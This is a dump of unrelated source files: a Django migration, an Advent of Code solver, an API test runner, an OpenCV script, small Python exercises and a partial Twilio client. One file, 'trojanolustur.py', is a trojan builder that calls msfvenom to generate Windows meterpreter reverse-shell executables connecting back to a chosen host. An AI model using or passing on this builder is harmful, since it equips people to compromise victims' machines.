6a3e246b107a66aee8e3ca5850f3ebe6bd36d4db | 1519d8c53539fba7fb9cca62d913546dd9c1f3d7 | /database/hiree_database/database_app/migrations/0007_jobpost_job_active.py | dc448af28a7f9a1e4be2758a08a529a2a009fc95 | [] | no_license | Ashish-3001/HireeDatabase | 86f4b0a8fbdbf79de10e0f4dd731a533e0c7fadb | 91185b95a76513367a37d145cbf245154adb9f04 | refs/heads/master | 2022-11-21T11:47:42.415452 | 2020-07-22T20:31:36 | 2020-07-22T20:31:36 | 272,979,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.5 on 2020-06-11 19:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('database_app', '0006_auto_20200611_0142'),
]
operations = [
migrations.AddField(
model_name='jobpost',
name='job_active',
field=models.BooleanField(default=True),
),
]
| [
"cvnnashish@gmail.com"
] | cvnnashish@gmail.com |
dc405b8f4c802e4f422a8113af252da208d50723 | 437fa0b3a6f680681450ffee9292098c8b657d3a | /trojanolustur.py | 952ee14483161d2a17c0012643cf704e3fae1bdc | [] | no_license | msgulsever/Cyber-Security-Tools | f4c151240e5417f592526460d17355ee5e99ed4f | 7749bb51bc42a911a52f0038b8c9a327508a0edc | refs/heads/main | 2023-01-21T02:56:05.894363 | 2020-11-22T23:35:08 | 2020-11-22T23:35:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | #!/usr/bin/env python
import os
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet TROJAN OLUSTURMA")
print("""
Trojan Olusturma Aracina Hosgeldiniz
""")
ip = raw_input("Local veya Dis IP Girin: ")
port = raw_input ("Port Girin: ")
print("""
1)windows/meterpreter/reverse_tcp
2)windows/meterpreter/reverse_http
3)windows/meterpreter/reverse_https
""")
payload = raw_input ("payload No Girin: ")
kayityeri = raw_input ("Kayit yeri girin: ")
if(payload=="1"):
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + ip + " -f exe -o " + kayityeri)
if(payload=="2"):
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + ip + " -f exe -o " + kayityeri)
if(payload=="3"):
os.system("msfvenom -p windows/meterpreter/reverse_https LHOST=" + ip + " -f exe -o " + kayityeri)
| [
"noreply@github.com"
] | noreply@github.com |
83ff787ef99d8d4f62ae8fe9bdda0a73c98f6e38 | 1fec79e22fb8edd89c3c1931909eb9b99032e2ae | /11.py | 7cabf563ad3932490bd94630b9127b04133fb7bb | [] | no_license | chrismilleruk/aoc2020py | 589fc464ce93387ba5483de1405e1c9e7a178607 | 6cf94ac6c36c34c4d23e7d90beaaeda9adc348c5 | refs/heads/master | 2023-02-04T09:33:13.802980 | 2020-12-26T19:02:06 | 2020-12-26T19:02:06 | 320,413,577 | 0 | 0 | null | 2020-12-11T18:12:51 | 2020-12-10T23:19:04 | Python | UTF-8 | Python | false | false | 6,312 | py | # Day 11: Seating System
import pytest
import time
# Simulate your seating area by applying the seating rules repeatedly until no seats change state. How many seats end up occupied?
def part1(data, directional = False):
seating = Seating(data)
step = 0
for i in range(1000):
step += 1
start = time.perf_counter()
changed = seating.step(directional)
end = time.perf_counter()
rtime = (end - start) * 1000 # sec -> ms
print(f"Step {step} took {round(rtime)}ms - {seating.count_occupied()} occupied - changed:{changed}")
if not changed: break
return seating.count_occupied()
# Given the new visibility method and the rule change for occupied seats becoming empty, once equilibrium is reached, how many seats end up occupied?
def part2(data):
return part1(data, True)
class Seating:
def __init__(self, layout):
self.frame = layout.split('\n')
self.height = len(self.frame)
self.width = len(self.frame[0])
self.seats = [[x,y] for y, row in enumerate(self.frame) for x, seat in enumerate(row) if seat == 'L']
self.adjacent = list(map(self.gen_adjacent, self.seats))
self.directional = list(map(self.gen_directional, self.seats))
def gen_adjacent(self, seat):
[x, y] = seat
x1, x2, y1, y2 = max(x-1, 0), min(x+2, self.width), max(y-1, 0), min(y+2, self.height)
return [[x, y] for x in range(x1, x2) for y in range(y1, y2) if [x, y] != seat and self.frame[y][x] == 'L']
def gen_directional(self, seat):
[x, y] = seat
rx = [list(range(x-1, -1, -1)), [x] * self.width, list(range(x+1, self.width, 1))]
ry = [list(range(y-1, -1, -1)), [y] * self.height, list(range(y+1, self.height, 1))]
lines_of_sight = [list(zip(dx, dy)) for dx in rx for dy in ry if not (dx == rx[1] and dy == ry[1])]
# print(seat, lines_of_sight)
# print(self.viz_lines(lines_of_sight))
assert len(lines_of_sight) == 8
seats = []
for line in lines_of_sight:
for [x, y] in line:
if self.frame[y][x] == 'L':
seats.append([x, y])
break
return seats
def viz_lines(self, lines):
frame = [list('.' * self.width) for _ in range(self.height)]
for line in lines:
for [x, y] in line:
frame[y][x] = '+'
return "\n".join(["".join(line) for line in frame])
def count_occupied(self, seats = None):
return list(map(lambda seat: self.frame[seat[1]][seat[0]], seats or self.seats)).count('#')
def step(self, directional = False):
changes_made = False
tolerance = 5 if directional else 4
next_frame = [list('.' * self.width) for _ in range(self.height)]
for ([x, y], adjacent) in zip(self.seats, self.directional if directional else self.adjacent):
occupied = self.count_occupied(adjacent)
# If a seat is empty (L) and there are no occupied seats adjacent to it, the seat becomes occupied.
if self.frame[y][x] == 'L' and occupied == 0:
next_frame[y][x] = '#'
changes_made = True
# If a seat is occupied (#) and four or more seats adjacent to it are also occupied, the seat becomes empty.
elif self.frame[y][x] == '#' and occupied >= tolerance:
next_frame[y][x] = 'L'
changes_made = True
# Otherwise, the seat's state does not change.
else:
next_frame[y][x] = self.frame[y][x]
# print(x, y, self.frame[y][x], "".join(map(lambda seat: self.frame[seat[1]][seat[0]], adjacent)), occupied, next_frame[y][x])
self.frame = ["".join(line) for line in next_frame]
return changes_made
# At this point, something interesting happens: the chaos stabilizes and further applications of these rules cause no seats to change state! Once people stop moving around, you count 37 occupied seats.
def test_part1(example1):
assert part1(example1) == 37
def test_seating_step(example1):
seating = Seating(example1)
assert seating.frame == example1.split('\n')
seating.step()
assert seating.frame == """#.##.##.##
#######.##
#.#.#..#..
####.##.##
#.##.##.##
#.#####.##
..#.#.....
##########
#.######.#
#.#####.##""".split('\n')
seating.step()
assert seating.frame == """#.LL.L#.##
#LLLLLL.L#
L.L.L..L..
#LLL.LL.L#
#.LL.LL.LL
#.LLLL#.##
..L.L.....
#LLLLLLLL#
#.LLLLLL.L
#.#LLLL.##""".split('\n')
seating.step()
assert seating.frame == """#.##.L#.##
#L###LL.L#
L.#.#..#..
#L##.##.L#
#.##.LL.LL
#.###L#.##
..#.#.....
#L######L#
#.LL###L.L
#.#L###.##""".split('\n')
seating.step()
assert seating.frame == """#.#L.L#.##
#LLL#LL.L#
L.L.L..#..
#LLL.##.L#
#.LL.LL.LL
#.LL#L#.##
..L.L.....
#L#LLLL#L#
#.LLLLLL.L
#.#L#L#.##""".split('\n')
seating.step()
assert seating.frame == """#.#L.L#.##
#LLL#LL.L#
L.#.L..#..
#L##.##.L#
#.#L.LL.LL
#.#L#L#.##
..L.L.....
#L#L##L#L#
#.LLLLLL.L
#.#L#L#.##""".split('\n')
def test_seating_gen_directional(example1):
seating = Seating(example1)
assert seating.gen_directional([0,0]) == [[0,1], [2,0], [1,1]]
assert seating.gen_directional([6,0]) == [[5,0], [5,1], [6, 1], [8,0], [9,3]]
def _test_seating_step2(example1):
seating = Seating(example1)
assert seating.frame == example1.split('\n')
seating.step(True)
assert seating.frame == """#.##.##.##
#######.##
#.#.#..#..
####.##.##
#.##.##.##
#.#####.##
..#.#.....
##########
#.######.#
#.#####.##""".split('\n')
seating.step(True)
assert seating.frame == """#.LL.LL.L#
#LLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLL#
#.LLLLLL.L
#.LLLLL.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.##.L#
#L#####.LL
L.#.#..#..
##L#.##.##
#.##.#L.##
#.#####.#L
..#.#.....
LLL####LL#
#.L#####.L
#.L####.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.L#.L#
#LLLLLL.LL
L.L.L..#..
##LL.LL.L#
L.LL.LL.L#
#.LLLLL.LL
..L.L.....
LLLLLLLLL#
#.LLLLL#.L
#.L#LL#.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.L#.L#
#LLLLLL.LL
L.L.L..#..
##L#.#L.L#
L.L#.#L.L#
#.L####.LL
..#.#.....
LLL###LLL#
#.LLLLL#.L
#.L#LL#.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.L#.L#
#LLLLLL.LL
L.L.L..#..
##L#.#L.L#
L.L#.LL.L#
#.LLLL#.LL
..#.L.....
LLL###LLL#
#.LLLLL#.L
#.L#LL#.L#""".split('\n')
@pytest.fixture
def example1():
return """L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL"""
| [
"chrismilleruk@gmail.com"
] | chrismilleruk@gmail.com |
270f7c2b9a37a22f4f90d4b09ed14dadcab2e1e0 | c0aa7b314cf9d85cb3e42173614aaa9fb5576eaf | /tp/plugins/task_runner.py | 15b005ed16519a82b166e3bc56b8352d65bd4ac4 | [] | no_license | shaphan007/testplatform | 8ae5d2cea0d252da2d8348f2e284966c8ddde273 | 3e010e0f9f0669cf5d6f1f5a6dd9ee9396bf388a | refs/heads/master | 2023-06-10T08:41:06.221870 | 2021-06-22T03:15:52 | 2021-06-22T03:15:52 | 375,654,443 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 5,137 | py | # coding=gbk
# api 执行相关
import requests
from .status_conf import StatusConf
from ..models import Step, Case, Plan, Result
from datetime import datetime
import json
class ApiRunner():
def __init__(self, ip, port):
self.host = f'http://{ip}:{port}'
print('host:{self.host}')
# 执行api
def exec_api(self, api):
self.resp = None
try:
"""
@type api: 为具体测试api接口的实例化
"""
self.url = self.host + api.path
method = StatusConf.http_method[api.method]
content_type = StatusConf.content_types[api.content_type]
print(f"self.url:{self.url}")
print(f"method:{method}")
print(f"content_type:{content_type}")
# 根据请求类型来判断传参 post,put --请求体传参
if method in ['post', 'put']:
# 根据content_type 判断
if content_type == 'application/json':
self.resp = requests.request(method, self.url, json=json.loads(api.data))
elif content_type == 'application/x-www-form-urlencoded':
self.resp = requests.request(method, self.url, data=api.data)
else:
return {'msg': '请求暂时不支持'}
else:
# get 或 delete 类型请求
self.resp = requests.request(method, self.url, data=api.data)
except Exception as e:
self.status = StatusConf.step_status.error
self.error = repr(e) # 记录异常信息
print(f"步骤执行异常:{self.error}")
# 检查预期与实际是否一致
def check_result(self, expect):
"""
@type expect: 预期
"""
if self.resp:
print(f'self.resp.text:{self.resp.text}')
if expect == self.resp.text:
# 修改状态
self.status = StatusConf.step_status.success
else:
self.status = StatusConf.step_status.failed
self.error = f'{expect} not equal {self.resp.txt}'
# 步骤执行
def step_run(step_id, test_env):
"""
@param step_id: 测试步骤id
@param test_env: 测试环境
"""
ip = test_env.ip
port = test_env.port
target_step = Step.objects.get(pk=step_id) # 获取测试步骤
target_api = target_step.httpapi # 查询step表
# 更新步骤执行状态为running
target_step.status = StatusConf.step_status.running # 查询step表
print(f"target_step.status:{target_step.status}")
target_step.save()
# 触发接口
print(f'执行步骤')
try:
api_runner = ApiRunner(ip, port)
api_runner.exec_api(target_api)
api_runner.check_result(target_step.expected)
except Exception as e:
print(f'用例步骤执行失败:{repr(e)}')
# 执行完成 更新状态
target_step.status = api_runner.status
target_step.save()
return {'recode': 200, 'msg': '执行完成', 'status': target_step.status}
# 用例执行
def case_run(case_id, test_env):
target_case = Case.objects.get(pk=case_id)
step_list = target_case.step_set.all() # 反向查询出该用例中所以的步骤
# 循环执行用例中的步骤
for step in step_list:
print(f"step:{step}")
res = step_run(step.id, test_env)
print(f"status:{res['status']}")
if res['status'] != StatusConf.step_status.success:
return {'recode': 500, 'msg': '运行中断', 'status': 'failed'}
return {'recode': 200, 'msg': '运行结束', 'status': 'success'}
# 计划执行
def plan_run(request):
plan_id = request.GET.get('id')
target_plan = Plan.objects.get(pk=plan_id)
# 开始执行计划
print("开始执行计划")
start_time = datetime.now()
target_plan.status = StatusConf.plan_status.running # 更新状态为正在执行
target_plan.save()
# 循环执行计划中的用例
case_list = target_plan.cases.all()
# 用例执行情况
case_num = case_list.count()
pass_num = 0
failed_num = 0
for case in case_list:
print(f"case:{case}")
res = case_run(case.id, test_env=target_plan.environment)
if res['status'] == 'success':
pass_num += 1
else:
failed_num += 1
print("用例执行计划结束")
# 执行结束时间
end_time = datetime.now()
# 更新状态为已经执行
target_plan.status = StatusConf.plan_status.done
# 记录计划执行次数
target_plan.exec_counts += 1
# 测试人员
target_plan.executor = request.user
target_plan.save()
# 测试完成 -保存本次测试结果到 result
Result.objects.create(plan=target_plan, start_time=start_time, end_time=end_time, case_num=case_num,
pass_num=pass_num, failed_num=failed_num, executor=request.user)
return {'recode': 200, 'msg': '运行结束', 'status': target_plan.status, 'case_num': case_num, 'pass_num': pass_num,
'failed_num': failed_num}
| [
"1304832882@qq.com"
] | 1304832882@qq.com |
e6998d8ffb85300a81359374b5728c9b906e869c | 53f69aed7fd50532913b2688dddadc285f0921a7 | /Parte5.py | d0731e14787f6d47f93df771d7795028b1e4fe58 | [] | no_license | gabrielmf1/RobotEntrega2 | 144c3ba9d486e66ef2660d90a455031259f321ae | ed43f647795c904d359cbc44799b6cb2139f948f | refs/heads/master | 2021-02-10T15:34:05.405128 | 2020-03-02T16:18:23 | 2020-03-02T16:18:23 | 244,395,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,785 | py | import cv2
import numpy as np
from math import acos, degrees, sqrt
# Iniciando a captura de video:
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
# Definindo os limites das cores:
# HSV -> Hue Sat Value
lower_cyan = np.array([95, 90, 20])
upper_cyan = np.array([110, 255, 255])
lower_magenta = np.array([165, 100, 20])
upper_magenta = np.array([180, 255, 255])
# Returns an image containing the borders of the image
# sigma is how far from the median we are setting the thresholds
def auto_canny(image, sigma=0.33):
# compute the median of the single channel pixel intensities
v = np.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
#Mede a distancia entre a folha e a camera
def dist_folha_camera(n):
entre_circ = 14
f = 525
distancia = f * entre_circ/n
return distancia
#mede a distancia entre dois pontos
def dist_pontos(xa, ya, xb, yb):
d = (xb - xa)**2+(yb - ya)**2
dist = sqrt(d)
return dist
# Loop principal:
while True:
# Pegando um frame da webcam:
_, frame = cap.read()
# Convertendo o frame para HSV:
frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# Fazendo a mascara das duas cores:
mask_cyan = cv2.inRange(frame_hsv, lower_cyan, upper_cyan)
mask_magenta = cv2.inRange(frame_hsv, lower_magenta, upper_magenta)
# Juntando as duas mascaras:
mask_both = cv2.bitwise_or(mask_cyan, mask_magenta)
# Sobrepondo as mascaras com a imagem original para pegar as cores
# da imagem original:
output = cv2.bitwise_and(frame, frame, mask=mask_both)
# Convertendo o frame para GRAY:
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Tirando os ruidos da imagem:
frame_blur = cv2.GaussianBlur(frame_gray,(5,5),0)
# Retirando as bordas do frame:
edges = auto_canny(frame_blur)
# Bordas com cor:
edges_color = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT, 2, 40, param1=100, param2=100, minRadius=5, maxRadius=60)
# Verificando se pelomenos 1 circulo foi encontrado:
if circles is not None:
# Converter as coordenadas (x, y) para numeros inteiros:
circles = np.round(circles[0, :]).astype("int")
for (x, y, r) in circles:
# Desenhando uma borda ao redor do circulo
cv2.circle(output, (x, y), r, (0, 255, 0), 4)
# Desenhando uma linha entre os dois primeiros circulos
if len(circles) == 2:
# Pegando as coordenadas de cada circulo:
xa, ya, ra = circles[0]
xb, yb, rb = circles[1]
distancia = dist_pontos(xa, ya, xb, yb)
# Calculando o angulo da linha com a horizontal:
angulo = acos(abs(xb - xa) / distancia)
angulo = degrees(angulo)
# Colocanto a distancia e angulo na tela:
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(output, 'Distancia : {0:.2f}cm'.format(dist_folha_camera(distancia)), (0,25), font, 1, (255,255,255), 2, cv2.LINE_AA)
cv2.putText(output, 'Angulo : {0:.2f} graus'.format(angulo), (0,60), font, 1, (255,255,255), 2, cv2.LINE_AA)
#Colocando a linha entre as bolas
cv2.line(output, (xa, ya), (xb, yb), (255,0,0), 4)
# Mostrando o resultado:
cv2.imshow("Output", output)
# Apertar Q para sair do loop principal:
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Fechando as janelas e desligando a webcam:
cv2.destroyAllWindows()
cap.release() | [
"gabriel.miras.f@gmail.com"
] | gabriel.miras.f@gmail.com |
35567216643280a09ad3bd8935dace54d5234dbd | 2accbf8013faf4d879ebd5bf1de9767331d6c9ff | /Python/어서와 파이썬은 처음이지!/selection_sort.py | c2f36f2b8033bce395339903ad6ac0c18144ae19 | [] | no_license | egsu20/study | 5e8f7fe149342edd43378f9ccf264346f32128fe | 5a42d022f7402ee0354e3fd19769b5485205c55d | refs/heads/main | 2023-07-17T22:40:42.039749 | 2021-08-27T14:19:22 | 2021-08-27T14:19:22 | 324,571,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | def selection_sort(aList):
for i in range(len(aList)):
least = i
least_value = aList[i]
for j in range(i+1, len(aList)):
if aList[j] < least_value:
least_value = aList[j]
least = j
tmp = aList[i]
aList[i] = aList[least]
aList[least] = tmp
list1 = [7,8,5, 1,6]
selection_sort(list1)
print(list1)
| [
"56678959+egsu20@users.noreply.github.com"
] | 56678959+egsu20@users.noreply.github.com |
9a0efd92897fe170fc7b6274f6a4b78de5ba4563 | 52bb00d5e9dd936fb11aff2adb8c6d0f94849dc8 | /Stack/stackBasics.py | 02a1d2f1f7c25c4d306af354705e6860c171694f | [] | no_license | anildhaker/DataStructures | 1c7815d2bb1dc9d8ebd51e1ec868df8260557519 | e333fa5b95ecfc08a036bbeadfc4244f64361d7d | refs/heads/master | 2020-04-24T14:07:44.240689 | 2019-11-24T21:21:03 | 2019-11-24T21:21:03 | 172,009,569 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 418 | py | # Creating Stack using Arrays
from sys import maxsize
def createStack():
stack = []
return stack
def isEmpty(stack):
return (len(stack) == 0)
def push(stack, item):
stack.append(item)
def pop(stack):
if isEmpty(stack):
return (str(-maxsize - 1))
return stack.pop()
stack = createStack()
push(stack, str(10))
push(stack, str(20))
push(stack, str(30))
print(pop(stack) + " popped from stack")
| [
"anildhaker777@gmail.com"
] | anildhaker777@gmail.com |
f807ab26b6709ac4c4da5cd5a8fd8a42d2095e0d | 289aaefe2f78bde474ea082afe55054f14932be4 | /LearnPython3-master/14-各种if语句/test.py | f8ca0d1778a1946fc2b6debfc9952c9d347ba02f | [] | no_license | 13424010187/python | ed15dbad380164c846ef68692213dea7689b514e | aab8ba8565ed29e7d8b93d7ec3270fafb1294fe9 | refs/heads/master | 2023-07-17T07:57:47.694227 | 2021-08-15T09:57:06 | 2021-08-15T09:57:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | point = 5
# if
# if point > 30:
# print("MVP球星")
# if-else
# if point > 20:
# print("绝对球星")
# else:
# print("未来球星")
# if-elif-else
# if point > 30:
# print("MVP球星")
# elif point >= 20:
# print("绝对球星")
# else:
# print("未来球星")
# if-elif-elif-else
if point > 30:
print("MVP球星")
elif point >= 20:
print("绝对球星")
elif point >= 10:
print("未来球星")
else:
print("普通球员") | [
"1393699623@qq.com"
] | 1393699623@qq.com |
e7d838441af4644f293ada41a9292abbeb913be1 | b08d42933ac06045905d7c005ca9c114ed3aecc0 | /src/coefSubset/evaluate/ranks/fifth/rank_2x9a_L.py | e66f7696ff621027b573962e362ee9ac48c79b60 | [] | no_license | TanemuraKiyoto/PPI-native-detection-via-LR | d148d53f5eb60a4dda5318b371a3048e3f662725 | 897e7188b0da94e87126a4acc0c9a6ff44a64574 | refs/heads/master | 2022-12-05T11:59:01.014309 | 2020-08-10T00:41:17 | 2020-08-10T00:41:17 | 225,272,083 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,204 | py | # 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script.
# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue.
import os
import pandas as pd
import numpy as np
import pickle
os.chdir('/mnt/scratch/tanemur1/')
# Read the model and trainFile
testFile = '2x9a.csv'
identifier = 'L'
thresholdCoef = 0.2
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/fifth/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/fifth/ranks/'
pdbID = testFile[:4]
with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
clf = pickle.load(f)
result = pd.DataFrame()
scoreList = []
df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
df1 = df1.reindex(sorted(df1.columns), axis = 1)
# Drop features with coefficients below threshold
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs = coefs[np.abs(coefs['coefficients']) < thresholdCoef]
dropList = list(coefs.index)
del coefs
df1.drop(dropList, axis = 1, inplace = True)
with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
scaler = pickle.load(g)
for i in range(len(df1)):
# subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]]. Also some input files have 'class' column. This is erroneous and is removed.
df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
# Standardize inut DF using the standard scaler used for training data.
df2 = scaler.transform(df2)
# Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex
predictions = clf.predict(df2)
score = sum(predictions)
scoreList.append(score)
# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)
with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
result.to_csv(h)
| [
"tanemur1@msu.edu"
] | tanemur1@msu.edu |
07df1de62e44822f02261a1845d6b75aac9897f7 | 3f327d2654b85b922909925b9f475315d78f4652 | /Backend/lib/python3.6/site-packages/twilio/rest/ip_messaging/v1/service/channel/invite.py | 4b462d7f7cd71af4bee1ea50fb21314fbac28cac | [
"MIT"
] | permissive | brianwang1217/SelfImprovementWebApp | 8db45914027537aee9614f9d218c93cc08dc90f8 | 7892fc4ee5434307b74b14257b29a5f05a0a0dd7 | refs/heads/master | 2022-12-13T15:01:08.595735 | 2018-06-23T04:46:06 | 2018-06-23T04:46:06 | 137,548,289 | 1 | 1 | MIT | 2022-05-25T01:28:29 | 2018-06-16T02:48:52 | Python | UTF-8 | Python | false | false | 14,677 | py | # coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class InviteList(ListResource):
""" """
def __init__(self, version, service_sid, channel_sid):
"""
Initialize the InviteList
:param Version version: Version that contains the resource
:param service_sid: The service_sid
:param channel_sid: The channel_sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteList
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteList
"""
super(InviteList, self).__init__(version)
# Path Solution
self._solution = {
'service_sid': service_sid,
'channel_sid': channel_sid,
}
self._uri = '/Services/{service_sid}/Channels/{channel_sid}/Invites'.format(**self._solution)
def create(self, identity, role_sid=values.unset):
"""
Create a new InviteInstance
:param unicode identity: The identity
:param unicode role_sid: The role_sid
:returns: Newly created InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
data = values.of({
'Identity': identity,
'RoleSid': role_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return InviteInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
)
def stream(self, identity=values.unset, limit=None, page_size=None):
"""
Streams InviteInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode identity: The identity
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.chat.v1.service.channel.invite.InviteInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
identity=identity,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, identity=values.unset, limit=None, page_size=None):
"""
Lists InviteInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode identity: The identity
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.chat.v1.service.channel.invite.InviteInstance]
"""
return list(self.stream(
identity=identity,
limit=limit,
page_size=page_size,
))
def page(self, identity=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of InviteInstance records from the API.
Request is executed immediately
:param unicode identity: The identity
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InvitePage
"""
params = values.of({
'Identity': identity,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return InvitePage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of InviteInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InvitePage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return InvitePage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a InviteContext
:param sid: The sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteContext
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
return InviteContext(
self._version,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a InviteContext
:param sid: The sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteContext
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
return InviteContext(
self._version,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.IpMessaging.V1.InviteList>'
class InvitePage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the InvitePage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param service_sid: The service_sid
:param channel_sid: The channel_sid
:returns: twilio.rest.chat.v1.service.channel.invite.InvitePage
:rtype: twilio.rest.chat.v1.service.channel.invite.InvitePage
"""
super(InvitePage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of InviteInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.chat.v1.service.channel.invite.InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
return InviteInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.IpMessaging.V1.InvitePage>'
class InviteContext(InstanceContext):
""" """
def __init__(self, version, service_sid, channel_sid, sid):
"""
Initialize the InviteContext
:param Version version: Version that contains the resource
:param service_sid: The service_sid
:param channel_sid: The channel_sid
:param sid: The sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteContext
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
super(InviteContext, self).__init__(version)
# Path Solution
self._solution = {
